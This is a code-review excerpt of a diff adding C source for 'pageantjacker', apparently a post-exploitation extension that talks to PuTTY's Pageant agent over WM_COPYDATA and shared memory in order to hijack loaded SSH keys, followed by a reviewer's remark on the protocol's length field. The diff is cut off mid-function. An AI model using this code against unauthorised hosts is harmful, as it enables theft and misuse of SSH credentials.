source/extensions/pageantjacker/pageantjacker.c

```diff
@@ -0,0 +1,186 @@
+*/
+DWORD __declspec(dllexport) GetExtensionName(char* buffer, int bufferSize)
+{
+	strncpy_s(buffer, bufferSize, "pageantjacker", bufferSize - 1);
+	return ERROR_SUCCESS;
+}
+
+PAGEANTQUERYRESULTS send_query_to_pageant(byte *query, unsigned int querylength) {
+
+	char strPuttyRequest[23]; // This will always be 23 chars
+	COPYDATASTRUCT pageant_copy_data;
+	unsigned char *filemap_pointer;
+	HANDLE filemap;
+	PAGEANTQUERYRESULTS ret;
+	HWND hPageant;
+	unsigned int protocol_return_length;
+	unsigned int api_result;
+	void *memcpy_result;
+
+	// Initialise the results arrays
+	memset((void *) &ret, 0, sizeof(ret));
+	memset((void *) &strPuttyRequest, 0, sizeof(strPuttyRequest));
+	ret.result = FALSE;
+	ret.error_message = PAGEANTJACKER_ERROR_NOERROR;
+
+	if (hPageant = FindWindowW(PAGEANT_NAME, PAGEANT_NAME)) {
+
+		dprintf("[PJ(send_query_to_pageant)] Pageant Handle is %x",hPageant);
+
+		// Generate the request string and populate the struct
+		if (_snprintf_s((char *)&strPuttyRequest, sizeof(strPuttyRequest), _TRUNCATE, "PageantRequest%08x", (unsigned int)GetCurrentThreadId())) { 
+			pageant_copy_data.dwData = AGENT_COPYDATA_ID;
+			pageant_copy_data.cbData = sizeof(strPuttyRequest);
+			pageant_copy_data.lpData = &strPuttyRequest;
+			dprintf("[PJ(send_query_to_pageant)] Request string is at 0x%p (%s)", &pageant_copy_data.lpData, pageant_copy_data.lpData);
+
+			// Pageant effectively communicates with PuTTY using shared memory (in this case, a pagefile backed memory allocation).
+			// It will overwrite this memory block with the result of the query.
+			filemap = CreateFileMappingA(INVALID_HANDLE_VALUE, NULL, PAGE_READWRITE, 0, AGENT_MAX, (char *) &strPuttyRequest);
+			if (filemap && filemap != INVALID_HANDLE_VALUE) {
+				dprintf("[PJ(send_query_to_pageant)] CreateFileMappingA returned 0x%x", filemap);
+				if (filemap_pointer = MapViewOfFile(filemap, FILE_MAP_WRITE, 0, 0, 0)) {
+					dprintf("[PJ(send_query_to_pageant)] MapViewOfFile returned 0x%x", filemap_pointer);
+
+					// Initialise and copy the request to the memory block that will be passed to Pageant.
+					memset((void *) filemap_pointer, 0, AGENT_MAX);
+					if (querylength)
+						memcpy(filemap_pointer, query, querylength);
+
+					dprintf("[PJ(send_query_to_pageant)] Request length: %d. Query buffer preview: %02X:%02X:%02X:%02X:%02X:%02X:%02X:%02X. Request buffer preview: %02X:%02X:%02X:%02X:%02X:%02X:%02X:%02X", querylength, query[0], query[1], query[2], query[3], query[4], query[5], query[6], query[7], filemap_pointer[0], filemap_pointer[1], filemap_pointer[2], filemap_pointer[3], filemap_pointer[4], filemap_pointer[5], filemap_pointer[6], filemap_pointer[7]);
+					
+					// Send the request message to Pageant.
+					dprintf("[PJ(send_query_to_pageant)] Ready to send WM_COPYDATA");
+					if (SendMessage(hPageant, WM_COPYDATA, (WPARAM) NULL, (LPARAM) &pageant_copy_data)) {
+
+						protocol_return_length = get_length_response(filemap_pointer)+4;

```

Comment:
Yep mate, that's because the protocol itself specifies the first 4 bytes = length DWORD, with the rest of it being arbitrary binary - its a length not a ptr. That said, it can't be any larger than 8192 anyway for Pageant! :)